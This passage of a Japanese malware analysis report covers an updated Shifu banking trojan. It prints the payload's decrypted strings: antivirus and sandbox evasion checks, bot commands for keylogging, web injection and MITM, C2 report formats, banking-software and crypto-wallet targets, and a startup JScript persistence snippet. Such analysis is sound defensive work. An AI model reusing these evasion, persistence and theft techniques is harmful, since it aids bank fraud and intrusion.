\u30d5\u30a1\u30a4\u30eb\u304c\u4f5c\u6210\u3055\u308c\u3001%TEMP%\u30d5\u30a9\u30eb\u30c0\u3067\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u5143\u306e\u5b9f\u884c\u6e08\u307f\u306e\u521d\u671f\u30ed\u30fc\u30c0\u30fc\u3092\u30e9\u30f3\u30c0\u30e0\u306a\u30d0\u30a4\u30c8\u6570\u3067\u4e0a\u66f8\u304d\u3059\u308b\u3053\u3068\u3067\u3001\u305d\u306e\u75d5\u8de1\u304c\u96a0\u853d\u3055\u308c\u307e\u3059\u3002\u30e9\u30f3\u30c0\u30e0\u306a\u30d0\u30a4\u30c8\u306e\u5f8c\u306b\u306f\u3001\u5e38\u306b\u30b9\u30da\u30fc\u30b9\u6587\u5b57\u3068CR LF\u5236\u5fa1\u6587\u5b57\u304c\u7d9a\u304d\u307e\u3059\u3002<\/p>\n<h4>\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u5206\u6790<\/h4>\n<p style=\"font-weight: 400;\">\u9759\u7684\u5206\u6790\u3092\u3088\u308a\u56f0\u96e3\u306b\u3059\u308b\u305f\u3081\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9 \u30e2\u30b8\u30e5\u30fc\u30eb\u306eIAT\u95a2\u6570\u540d\u3068\u93750xFF\u3068\u306eXOR\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002.data\u30bb\u30af\u30b7\u30e7\u30f3\u306b\u3042\u308b\u6709\u610f\u7fa9\u306a\u6587\u5b57\u5217\u3068\u93750x8D\u3068\u306eXOR\u3082\u5b9f\u884c\u3055\u308c\u3001\u5373\u5ea7\u306b\u5fa9\u53f7\u5316\u3055\u308c\u307e\u3059\u3002\u5fa9\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">AddMandatoryAce\r\nADVAPI\r\nAdvapi32.dlladvapi32.dllws2_32.dll\r\nWPUCloseEvent\r\nWPUCloseSocketHandleWPUCreateEvent\r\nWPUCreateSocketHandle\r\nWPUFDIsSet\r\nWPUGetProviderPath\r\nWPUModifyIFSHandle\r\nWPUPostMessage\r\nWPUQueryBlockingCallbackWPUQuerySocketHandleContext\r\nWPUQueueApc\r\nWPUResetEvent\r\nWPUSetEvent\r\nWPUOpenCurrentThreadWPUCloseThread\r\nWSPStartup\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/echo \r\n &gt; %1\\r\\ndel %0\r\nrundll32.exe shell32.dll, ShellExec_RunDLL %s\r\nsoftware\\\\microsoft\\\\windows\\\\currentversion\\\\run\r\nMicrosoft\\\\Microsoft AntimalwareSoftware\\\\Coranti\r\nSoftware\\\\risingSoftware\\\\TrendMicroSoftware\\\\Symantec\r\nSoftware\\\\ComodoGroup\r\nSoftware\\\\Network Associates\\\\TVD\r\nSoftware\\\\Data Fellows\\\\F-SecureSoftware\\\\Eset\\\\Nod\r\nSoftware\\\\Softed\\\\ViGUARD\r\nSoftware\\\\Zone Labs\\\\ZoneAlarm\r\nSoftware\\\\Avg\r\nSoftware\\\\VBA32\r\nSoftware\\\\Doctor WebSoftware\\\\G DataSoftware\\\\Avira\r\nSoftware\\\\AVAST Software\\\\Avast\r\nSoftware\\\\KasperskyLab\\\\protected\r\nSoftware\\\\Bitdefender\r\nSoftware\\\\Panda SoftwareSoftware\\\\Sophos.bat|$$$}rstuvwxyz{$$$$$$$&gt;?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\\\\]^_`abcdefghijklmnop\r\nq\r\n\\\\\\\\.\\\\%C:\r\nconhost\r\nCreateProcessInternalW\r\nConvertStringSecurityDescriptorToSecurityDescriptorWContent-Type: application\/x-www-form-urlencoded\\r\\n\r\nContent-Type: multipart\/form-data; boundary=---------------------------%s\\r\\n\r\nHost: %s\\r\\n%d.%d.%d.%d\r\n%d.%d.%d.%d.%x\r\n%temp%\\\\debug_file.txt\r\n[%u][%s:%s:%u][0x%x;0x%x] %sDnsFlushResolverCache\r\n\\\\*.*\r\ndnsapi.dll\r\nDnsGetCacheDataTable.dll.exedownload.windowsupdate.com\r\nvk.com\r\nyandex.ru\r\nHTTP\/1.1https:\/\/http:\/\/%s\r\nIsWow64Process\r\nkernel\r\nkernel32.dllLdrGetProcedureAddress\r\nMicrosoft\r\nNtAllocateVirtualMemory\r\nCLOSED\r\nLAST_ACKTIME_WAIT\r\nDELETE_TCB\r\nLISTEN\r\nSYN_SENTSYN_RCVDESTAB\r\nFIN_WAIT1\r\nFIN_WAIT2\r\nCLOSE_WAIT\r\nCLOSING\r\nTCP\\t%s:%d\\t%s:%d\\t%s\\n\r\nnetstat\\nProto\\tLocal address\\tRemote address\\tState\\n\r\nntdll.dll\r\nNtResumeProcess\r\nNtSuspendProcess\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\drivers\\\\null.sys\r\nNtWriteVirtualMemoryopenRegisterApplicationRestart\r\nRtlCreateUserThread\r\nResetSR\r\nRtlComputeCrc32\r\nrundll32SeDebugPrivilegeSystemDrive\r\n\\\\StringFileInfo\\\\%04x%04x\\\\ProductName\r\nsoftware\\\\microsoft\\\\windows nt\\\\currentversion\\\\winlogon\r\nshell\r\nSleep\r\nsrclient.dllSeShutdownPrivilege\r\n\\\"%s\\\"\r\n%d\\t%s\\ntaskmgr\\nPID\\tProcess name\\nnet user\\n\r\nthe computer is joined to a domain\\n..\r\n\\\\VarFileInfo\\\\Translation\r\n%windir%\\\\system32\\\\%windir%\\\\syswow64\\\\POST*.exe\r\n%SystemDrive%\\\\\r\n*SYSTEM*%02x%s:Zone.Identifier\r\nGetProcessUserModeExceptionPolicy\r\nSetProcessUserModeExceptionPolicy\r\n%ws\\\\%ws\\n\r\nWORKGROUP\r\nHOMEsoftware\\\\microsoft\\\\windowsSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\ExplorerDisableCurrentUserRun\r\n%s.dat\r\n%OS%_%NUMBER_OF_PROCESSORS%\r\nS:(ML;;NRNWNX;;;LW)D:(A;;GA;;;WD)\r\nS:(ML;;NRNWNX;;;LW)D:(A;;GA;;;WD)(A;;GA;;;AC)\r\n\\\\\\\\.\\\\AVGIDSShim\r\nFFD3\\\\\\\\.\\\\NPF_NdisWanIpc:\\\\sample\\\\pos.exe\r\nANALYSERS\r\nSANDBOX\r\nVIRUS\r\nMALWARE\r\nFORTINETMALNETVMc:\\\\analysis\\\\sandboxstarter.exec:\\\\analysisc:\\\\insidetmc:\\\\windows\\\\system32\\\\drivers\\\\vmmouse.sys\r\nc:\\\\windows\\\\system32\\\\drivers\\\\vmhgfs.sys\r\nc:\\\\windows\\\\system32\\\\drivers\\\\vboxmouse.sys\r\nc:\\\\iDEFENSEc:\\\\popupkiller.exe\r\nc:\\\\tools\\\\execute.exe\r\nc:\\\\Perlc:\\\\Python27api_log.dll\r\ndir_watch.dll\r\npstorec.dll\r\ndbghelp.dll\r\nProcess32NextW\r\n1406Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\r\n.bitMiniDumpWriteDump\r\n\\r\\nReferer: %s\\r\\n\r\n\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\r\nvar %s = new ActiveXObject(\"WScript.Shell\"); %s.Run(\"%s\");\r\nGenuineIntelAuthenticAMDCentaurHauls7z\r\nfnbqooqdaixfueangywblgabirdgvkewdyqgfqaioluesyrpryfkjerfsouemaxnavrkguxmcmhckwprunurmhehclermtufwiyjbqhwlunbun\r\nuumeowfjmerxppxrgaxukyx\r\nPowerManager_M5VKII_%d\r\n[type=ftp]\\n[botid=%s]\\n[proc=%s]\\n[data=%s]\\n\r\n[type=pop3]\\n[botid=%s]\\n[proc=%s]\\n[data=%s]\\n\r\n%OS%_%NUMBER_OF_PROCESSORS%\r\n[type=post]\\n[botid=%s]\\n[url=%s]\\n[ua=%s]\\n[proc=%s]\\n[ref=%s]\\n[keys=%s]\\n[data=%s]\\n\r\nname=%s&amp;ok=%s&amp;id=%d&amp;res_code=%d&amp;res_text=%s_%x\r\nname=%s&amp;ok=%s&amp;id=%d&amp;res_code=%d&amp;res_text=%s\r\nbotid=%s&amp;ver=%s.%u&amp;up=%u&amp;os=%u&amp;ltime=%s%d&amp;token=%d&amp;cn=%s&amp;av=%s&amp;dmn=%s&amp;mitm=%u\r\njava.exe|javaw.exe|plugin-container.exe|acrobat.exe|acrod32.exe\r\ntellerplus|bancline|fidelity|micrsolv|bankman|vanity|episys|jack \r\nhenry|cruisenet|gplusmain|silverlake|v48d0250s1Root|TrustedPeople|SMS|Remote Desktop|REQUEST\r\nTREASURE|BUH|BANK|ACCOUNT|CASH|FINAN|MONEY|MANAGE|OPER|DIRECT|ROSPIL|CAPO|BOSS|TRADEactive_bc\r\n-----------------------------%s\\r\\nContent-Disposition: form-data; name=\\\"pcname\\\"\\r\\n\\r\\n%s!%s\\r\\n-----------------------------\r\n%s\\r\\nContent-Disposition: form-data; name=\\\"file\\\"; filename=\\\"report\\\"\\r\\nContent-Type: text\/plain\\r\\n\\r\\n%s\\r\\n--------------\r\n---------------%s--\\r\\n\r\n%domain%deactivebc\r\ninject\r\nkill_os\r\nloadactive_sk\r\ndeactive_sk\r\nwipe_cookiesmitm_modmitm_script\r\nmitm_geterr\r\nget_keylog\r\nget_sols!active_bc\\[(\\d+)\\] (\\S+) (\\d+)\r\n!deactive_bc\\[(\\d+)\\]\r\n!inject\\[(\\d+)\\] (\\S+)\r\n!kill_os\\[(\\d+)\\]\r\n!get_keylog\\[(\\d+)\\]!load\\[(\\d+)\\] (\\S+)!update\\[(\\d+)\\] (\\S+)\r\n!wipe_cookies\\[(\\d+)\\]\r\n!active_sk\\[(\\d+)\\] (\\S+) (\\d+)\r\n!deactive_sk\\[(\\d+)\\]\r\n!mitm_mod\\[(\\d+)\\] (\\S+) (\\d+) (\\S+)!mitm_script\\[(\\d+)\\] (\\S+)\r\n!mitm_geterr\\[(\\d+)\\]\r\n!get_sols\\[(\\d+)\\]\r\nATCASH\r\nATLOCAL\r\nCERTCERTX\r\nCOLVCRAIF\r\nCRYPT\r\nCTERM\r\nSCREEN\r\nINTER\r\nELBALOCAL\r\nELBAWEB\r\nELBAWEB\r\nELBAWEB\r\nPUTTY\r\nVNCVIEW\r\nMCLOCAL\r\nMCSIGN\r\nOPENVPN\r\nPIPEK\r\nPIPEK\r\nPIPEK\r\nPIPEK\r\nPOSTSAP\r\nchrome.dll\r\nmxwebkit.dlldragon_s.dlliron.dllvivaldi.dll\r\nnspr4.dll\r\nnss3.dllbrowser.dll\r\nAdvapi32.dllrsaenh.dll\r\nkernel32.dllIprivLibEx.dll\r\ncryptui.dll\r\ncrypt32.dll\r\nntdll.dll\r\nssleay32.dllurlmon.dll\r\nuser32.dll\r\nWininet.dll\r\nWs2_32.dll\r\nPSAPI.dll\r\nNzBrco.dll\r\nVirtualProtect\r\nLoadLibraryExW\r\nZwQuerySystemInformationWSARecv\r\nWSASend\r\nZwDeviceIoControlFile\r\nURLDownloadToCacheFileW\r\nURLDownloadToFileW\r\nTranslateMessageSSL_get_fd\r\nSSL_write\r\nPFXImportCertStore\r\nCryptEncryptCPExportKey\r\nCreateProcessInternalW\r\nCreateDialogParamW\r\nGetClipboardDatagetaddrinfo\r\ngethostbyname\r\nGetAddrInfoExW\r\nGetMessageA\r\nGetMessageW\r\nDeleteFileA\r\nGetModuleBaseNameW\r\nbad port value\r\ncan't find plug-in path\r\ncan't get bot path\r\ncan't download file\r\ncan't encrypt file\r\ncan't save inject config to filecan't get temp file\r\nfile is not valid PEcan't delete original file\r\ncan't replace original file\r\ncan't close handle\r\ncan't protect file\r\noriginal file not found\r\ncan't execute file\r\ncan't create directory\r\ncan't unzip file #1\r\ncan't unzip file #2\r\nmitm_mod is inactivehttpd.exe is anactive\r\nmicrosoft.com\r\ndropbox.com\r\nKEYGRAB\r\nPasswordTELEMACOScelta e Login dispositivo\r\nTLQ Web\r\ndb Corporate Banking WebSecureStoreCSP - enter PIN\r\ngoogle.com\r\nSoftware\\\\SimonTatham\\\\PuTTYreg.txt\r\nSoftware\\\\Microsoft\\\\Internet Explorer\\\\MainTabProcGrowth\r\nTemp\\\\Low\r\n crc32[%x]\r\nACCT \r\nAUTHINFO PASS \r\nAUTHINFO USER \r\nAuthorization\r\n:BA:[bks]\r\n%X!%X!%08X\r\nbtc_path.txtbtc_wallet.dat\r\nbitcoin\\\\wallet.dat\r\n%s%s\\\\%u_cert.pfx\r\ncmdline.txt\r\n1.3.6.1.5.5.7.3.3\r\nCodeSign\\n\r\nSoftware\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\r\n[del]\r\nDefault\r\n.exeELBA5\\\\ELBA_dataftp:\/\/anonymous:ftp:\/\/%s:%s@%s:%d\\n\r\nHBPData\\\\hbp.profileHH:mm:ssdd:MMM:yyyy\r\nI_CryptUIProtect\\\\exe\\\\\r\ninfected.exx%s%s\\\\%u_info.txt\r\n[ins]\r\nInstallDate\r\n%02u.jpg%s\\\\%02d.jpgKEYLOG\r\n%s\\\\keylog.txt\r\n[TOKEN ON]\r\n\\n\\n[%s (%s-%s) - %s (%s)]\\n[pst]%s[\/pst]\r\nltcd_path.txt\r\nltcd_wallet.dat\r\nlitecoind\\\\wallet.dat\r\nltc_path.txtltc_wallet.dat\r\nlitecoin\\\\wallet.dat\\\\MacromediaMultiCash@Sign\r\nC:\\\\Omikron\\\\MCSign\r\n[ML][MR]Global\\\\{4C470E-%08x-%08x-%08x}\r\nGlobal\\\\{DAN6J0-%s}\r\nnoneopera.exe\r\nPASS \r\npassword.txt\\\\\\\\.\\\\pipe\\\\%s\r\npop3:\/\/%s:%s@%s:%d\\n%PROCESSOR_ARCHITECTURE%Referer\r\n[ret]\r\n%08x\\\\system32\\\\rstrui.exe\r\n\\\\scrs\\\\send%s%s%s%d%s:%s\r\nsysinfo.txt\r\n[tab]\r\ndata.txt&lt;unnamed&gt;\r\n&lt;untitled&gt;\r\nupdate\r\nUSER \r\nUser-agent\r\nvkeys\r\n%x\\r\\n\r\n\\r\\n%x%x%x.tmp\r\n\\\\*.txt\r\n%02x%2b\r\ntorrent\r\n-config config.vnc\r\n--config \r\nconfig.ovpn\r\ndata.txt[type=post]\\n\r\nCreateFileW\r\npos.exe\r\nbank.exePOS\r\nsecure.\r\n.mozgoogle.com\r\nCertVerifyCertificateChainPolicyCertGetCertificateChain\r\nSSL_AuthCertificateHook\r\nUSERNAMESoftware\\\\ESET\\\\ESET Security\\\\CurrentVersion\\\\Info\r\nC8FFAD27AE1BBE28BE24DDF20AF36EF901C609968930ED82CEFBC64808BA34102C4FABA0560523FB4CCBF33684F77C8401DFB\r\n3A7D2D598E872DD78033E7F900B78A0C710CDF0941662FF7745A435D4BC18D5661E0582B21B2DB8FCA1C0CA3401D0FC9F051\r\n85A558AB6A76A010F606CD77B35A480B6B7176F0903299B91F1BBD141B4D33615849C35557357DAB819BC3D4A8722BB433DE\r\nB66C7A326BE859BD94930331B37DEE6EF4C475EA4B33DE4699FFDBCD34E196E19FE630E631D2C612705048620183BCF56709B\r\n484A4380C4B00D8D94D131C31DB53AE6BCDCCC14131BAC99A68C59A604D0AE9116E9196F7FA3EA5F86F67E9B175CC09D3E17\r\n997728B7D\r\n10001\r\nget=1\r\nCOMPNAMEAppDataDir\r\nupdfiles\\\\upd.ver\r\nupdfiles\\\\lastupd.ver\r\nSYSTEM\\\\CurrentControlSet\\\\services\\\\Avg\\\\SystemValues\r\nLocal AppData\r\nAvg2015\r\nAvg2014\r\nAvg2013\r\nAvg2012\r\nAvg2011\r\nupdate\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\explorer\\\\Browser Helper Objects\\\\{8CA7E745-EF75-4E7B-BB86-\r\n8065C0CE29CA}\r\nSoftware\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\explorer\\\\Browser Helper Objects\\\\{BB62FFF4-41CB-4AFC-BB8C-\r\n2A4D4B42BBDC}\r\nSoftware\\\\Microsoft\\\\Internet Explorer\\\\MainEnable Browser Extensions\r\nhttpd.exe\r\n%s\\\\httpd.exe\r\nconnect\r\ndata\\\\index.php\r\nlogs\\\\error.log\r\nerror.log\r\n&lt;?\\n';\\n$bot_id = '\r\n$bot_net = '$key_log_file = '\r\n$process_file = '\r\n127.0.0.1\r\nListen %s:%u\\n\r\nconf\\\\httpd.confSSL_PORT%u&gt;\\n\r\n[type=post]\\n\r\n[type=screen]\\n\r\n[type=knock]\\n\r\n74??834E0440B832FFFFFF\r\n74??834E04405F5EB832FFFFFF\r\nDEBUG\r\nmemory.dmp\r\nconfig.xml\r\nphp5ts.dll\r\nzend_stream_fixup\r\nzend_compile_file\r\nindex.php\r\nconfig.php\r\ncontent.php\r\niexplore.exe|firefox.exe|chrome.exe|opera.exe|browser.exe|dragon.exe|epic.exe|sbrender.exe|vivaldi.exe|maxthon.exe|ybr\r\nowser.exe|microsoftedgecp.exe\r\nInternetQueryDataAvailable\r\nInternetReadFileInternetReadFileExA\r\nInternetReadFileExW\r\nInternetSetStatusCallbackA\r\nInternetSetStatusCallbackW\r\nHttpSendRequestAHttpSendRequestExA\r\nHttpSendRequestExW\r\nHttpSendRequestW\\r\\n0\\r\\n\\r\\n\r\n.rdata\r\n\\r\\n\\r\\nHTTP\/1.\r\nTransfer-Encoding\r\nchunked\r\nContent-Length\r\nclose\r\nProxy-ConnectionHostAccept-Encoding\r\nx-xss-protectionx-content-security-policy\r\nx-frame-options\r\nx-content-type-options\r\nIf-Modified-Since\r\nIf-None-Match\r\ncontent-security-policy\r\nx-webkit-cspConnection\r\nhttp:\/\/\r\nhttps:\/\/NSS layer\r\nContent-TypeBasic \r\nPR_ClosePR_Connect\r\nPR_GetNameForIdentity\r\nPR_Read\r\nPR_SetError\r\nPR_WriteReferer: \r\nAccept-Encoding:\\r\\n1406SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\r\ndata_after\\ndata_before\\n\r\ndata_enddata_inject\\n\r\nset_url %BOTID%\r\n%BOTNET%InternetCloseHandle\r\nHTMLc:\\\\inject.txt\r\nDalvik\/1.6.0 (Linux; U; Android 4.1.2; GT-N7000 Build\/JZO54K)\r\nxxx_process_0x%08x\r\nCommon.js\r\n<\/pre>\n<h4>API\u306e\u96e3\u8aad\u5316<\/h4>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001<a href=\"https:\/\/www.symantec.com\/content\/en\/us\/enterprise\/media\/security_response\/whitepapers\/a_museum_of_api_obfuscation_on_win32.pdf\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">Push-Calc-Ret\u96e3\u8aad\u5316<\/a>\u3068\u3057\u3066\u77e5\u3089\u308c\u308bAPI\u306e\u96e3\u8aad\u5316\u624b\u6cd5\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304csvchost\u30d7\u30ed\u30bb\u30b9\u306b\u633f\u5165\u3055\u308c\u305f\u5f8c\u3001\u5b9f\u969b\u306eAPI\u95a2\u6570\u3078\u306e\u547c\u3073\u51fa\u3057\u306f\u7b2c2\u30b9\u30c6\u30fc\u30b8\u306e\u30a4\u30f3\u30b8\u30a7\u30af\u30bf\u30fc\u306b\u3088\u3063\u3066\u30d1\u30c3\u30c1\u9069\u7528\u3055\u308c\u307e\u3059\u3002Windows API\u95a2\u6570\u3092\u547c\u3073\u51fa\u3059\u5fc5\u8981\u304c\u751f\u3058\u308b\u305f\u3073\u306b\u3001\u5b9f\u969b\u306e\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u3092\u8a08\u7b97\u3059\u308b\u3001\u30c8\u30e9\u30f3\u30dd\u30ea\u30f3\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u304c\u304b\u308f\u308a\u306b\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002\u30c8\u30e9\u30f3\u30dd\u30ea\u30f3\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u306f\u3059\u3079\u3066\u3001\u30e1\u30e2\u30ea\u5185\u306e\u914d\u5217\u306b\u683c\u7d0d\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u305f\u3068\u3048\u3070\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u304cCreateFile()\u3092\u547c\u3073\u51fa\u3059\u969b\u306b\u3001\u3053\u306e\u547c\u3073\u51fa\u3057\u306b\u5bfe\u3057\u3066\u30d1\u30c3\u30c1\u304c\u9069\u7528\u3055\u308c\u305f\u3068\u3057\u307e\u3059\u3002\u305d\u306e\u5834\u5408\u3001\u6b21\u306e\u3088\u3046\u306a\u30c8\u30e9\u30f3\u30dd\u30ea\u30f3\u95a2\u6570\u304c\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">00846110   PUSH 2B464C25\r\n00846115   PUSHFD\r\n00846116   XOR DWORD PTR SS:[ESP+4], 5DB5E13F\r\n0084611E   POPFD\r\n0084611F   RETN\r\n<\/pre>\n<p style=\"font-weight: 400;\">\u6700\u521d\u306b\u3001\u3042\u308b\u5024\u304c\u30b9\u30bf\u30c3\u30af\u306b\u30d7\u30c3\u30b7\u30e5\u3055\u308c\u307e\u3059\u3002\u6b21\u306b\u3001EFLAGS\u30ec\u30b8\u30b9\u30bf\u304c\u30b9\u30bf\u30c3\u30af\u306b\u4fdd\u5b58\u3055\u308c\u307e\u3059\u3002\u3053\u306e\u30ec\u30b8\u30b9\u30bf\u306f\u5f8c\u7d9a\u306eXOR\u547d\u4ee4\u306b\u3088\u3063\u3066\u5909\u66f4\u3055\u308c\u308b\u304b\u3089\u3067\u3059(OF\u3001CF\u30d5\u30e9\u30b0\u306f\u30af\u30ea\u30a2\u3055\u308c\u3001SF\u3001ZF\u3001PF\u30d5\u30e9\u30b0\u306f\u7d50\u679c\u306b\u5fdc\u3058\u3066\u8a2d\u5b9a\u3055\u308c\u307e\u3059)\u3002\u7d9a\u3044\u3066\u3001\u4ee5\u524d\u306b\u30d7\u30c3\u30b7\u30e5\u3057\u305f\u5024\u3068\u5225\u306e\u5024\u3068\u306eXOR\u304c\u5b9f\u884c\u3055\u308c\u3001\u5b9f\u969b\u306eAPI\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u304c\u8a08\u7b97\u3055\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001EFLAGS\u30ec\u30b8\u30b9\u30bf\u304c\u5fa9\u5143\u3055\u308c\u3001RETN\u547d\u4ee4\u3092\u4ecb\u3057\u3066\u5b9f\u969b\u306eAPI\u95a2\u6570\u30a2\u30c9\u30ec\u30b9\u304c\u547c\u3073\u51fa\u3055\u308c\u307e\u3059\u3002<\/p>\n<h4>\u6301\u7d9a\u624b\u6cd5<\/h4>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6700\u521d\u306e\u96e3\u8aad\u5316\u6e08\u307f\u30ed\u30fc\u30c0\u30fc \u30d5\u30a1\u30a4\u30eb\u3092%ProgramData%\u30d5\u30a9\u30eb\u30c0\u306b\u30b3\u30d4\u30fc\u3057\u307e\u3059\u3002\u305d\u306e\u969b\u306b\u3001GetTickCount()\u3092\u4f7f\u7528\u3057\u3066\u30e9\u30f3\u30c0\u30e0 \u30d5\u30a1\u30a4\u30eb\u3092\u53d6\u5f97\u3057\u307e\u3059\u3002\u7d9a\u3044\u3066\u3001\u73fe\u5728\u306e\u30e6\u30fc\u30b6\u30fc\u306e\u8d77\u52d5\u30d5\u30a9\u30eb\u30c0\u306b\u3001\u201cCommon.js\u201d\u3068\u3044\u3046\u540d\u524d\u306eJScript\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u306b\u306f\u3001\u30b7\u30b9\u30c6\u30e0\u306e\u518d\u8d77\u52d5\u5f8c\u306b\u6700\u521d\u306e\u30ed\u30fc\u30c0\u30fc\u3092\u5b9f\u884c\u3059\u308b\u6b21\u306e\u30b3\u30fc\u30c9\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">var yqvltidpue = new ActiveXObject(\"WScript.Shell\");\r\nyqvltidpue.Run(\"C:\\\\PROGRA~3\\\\930d4a6d.exe\")\r\n<\/pre>\n<h4>\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u6bd4\u8f03\u3057\u305f\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306e\u66f4\u65b0<\/h4>\n<p style=\"font-weight: 400;\">Shifu\u306e\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306b\u95a2\u3059\u308b\u30ec\u30dd\u30fc\u30c8\u306f\u3001<a href=\"https:\/\/www.fireeye.com\/blog\/threat-research\/2015\/10\/shifu-malware-analyzed-behavior-capabilities-and.html\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">FireEye<\/a>\u3068<a href=\"https:\/\/www.virusbulletin.com\/virusbulletin\/2015\/11\/shifu-rise-self-destructive-banking-trojan\/\" data-page-track=\"true\" data-page-track-value=\"company:update-of-shifu-banking-trojan-2016: section: \">Fortinet<\/a>\u304c\u767a\u884c\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u6bd4\u3079\u3066\u3001\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u540d\u3001\u30e6\u30fc\u30b6\u30fc\u540d\u3001\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u65e5\u3001\u30b7\u30b9\u30c6\u30e0 \u30c9\u30e9\u30a4\u30d6 \u30dc\u30ea\u30e5\u30fc\u30e0 \u30b7\u30ea\u30a2\u30eb\u756a\u53f7\u3092\u4f7f\u7528\u3057\u3066\u4f5c\u6210\u3055\u308c\u308b\u6587\u5b57\u5217\u306e\u3001\u30b9\u30ad\u30e3\u30f3\u5bfe\u8c61\u3067\u3042\u308b\u90e8\u5206\u6587\u5b57\u5217\u306e\u30ea\u30b9\u30c8\u306f\u9577\u304f\u306a\u308a\u307e\u3057\u305f\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">TREASURE<\/li>\n<li style=\"font-weight: 400;\">BUH<\/li>\n<li style=\"font-weight: 400;\">BANK<\/li>\n<li style=\"font-weight: 400;\">ACCOUNT<\/li>\n<li style=\"font-weight: 400;\">CASH<\/li>\n<li style=\"font-weight: 400;\">FINAN<\/li>\n<li style=\"font-weight: 400;\">MONEY<\/li>\n<li style=\"font-weight: 400;\">MANAGE<\/li>\n<li style=\"font-weight: 400;\">OPER<\/li>\n<li style=\"font-weight: 400;\">DIRECT<\/li>\n<li style=\"font-weight: 400;\">ROSPIL<\/li>\n<li style=\"font-weight: 400;\">CAPO<\/li>\n<li style=\"font-weight: 400;\">BOSS<\/li>\n<li style=\"font-weight: 400;\">TRADE<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u66f4\u65b0\u3055\u308c\u305f\u30b3\u30de\u30f3\u30c9 \u30ea\u30b9\u30c8:<\/p>\n<ul>\n<li style=\"font-weight: 400;\">active_sk<\/li>\n<li style=\"font-weight: 400;\">deactive_sk<\/li>\n<li style=\"font-weight: 400;\">deactivebc<\/li>\n<li style=\"font-weight: 400;\">get_keylog<\/li>\n<li style=\"font-weight: 400;\">get_sols<\/li>\n<li style=\"font-weight: 400;\">inject<\/li>\n<li style=\"font-weight: 400;\">kill_os<\/li>\n<li style=\"font-weight: 400;\">load<\/li>\n<li style=\"font-weight: 400;\">mitm_geterr<\/li>\n<li style=\"font-weight: 400;\">mitm_mod<\/li>\n<li style=\"font-weight: 400;\">mitm_script<\/li>\n<li style=\"font-weight: 400;\">wipe_cookies<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u6a19\u7684\u3068\u306a\u308b\u30d6\u30e9\u30a6\u30b6\u306e\u66f4\u65b0\u3055\u308c\u305f\u30ea\u30b9\u30c8:<\/p>\n<ul>\n<li style=\"font-weight: 400;\">iexplore.exe<\/li>\n<li style=\"font-weight: 400;\">firefox.exe<\/li>\n<li style=\"font-weight: 400;\">chrome.exe<\/li>\n<li style=\"font-weight: 400;\">opera.exe<\/li>\n<li style=\"font-weight: 400;\">browser.exe<\/li>\n<li style=\"font-weight: 400;\">dragon.exe<\/li>\n<li style=\"font-weight: 400;\">epic.exe<\/li>\n<li style=\"font-weight: 400;\">sbrender.exe<\/li>\n<li style=\"font-weight: 400;\">vivaldi.exe<\/li>\n<li style=\"font-weight: 400;\">maxthon.exe<\/li>\n<li style=\"font-weight: 400;\">ybrowser.exe<\/li>\n<li style=\"font-weight: 400;\">microsoftedgecp.exe<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u3044\u305a\u308c\u304b\u306eC&amp;C\u30b5\u30fc\u30d0\u304b\u3089Apache httpd.exe\u30b5\u30fc\u30d0 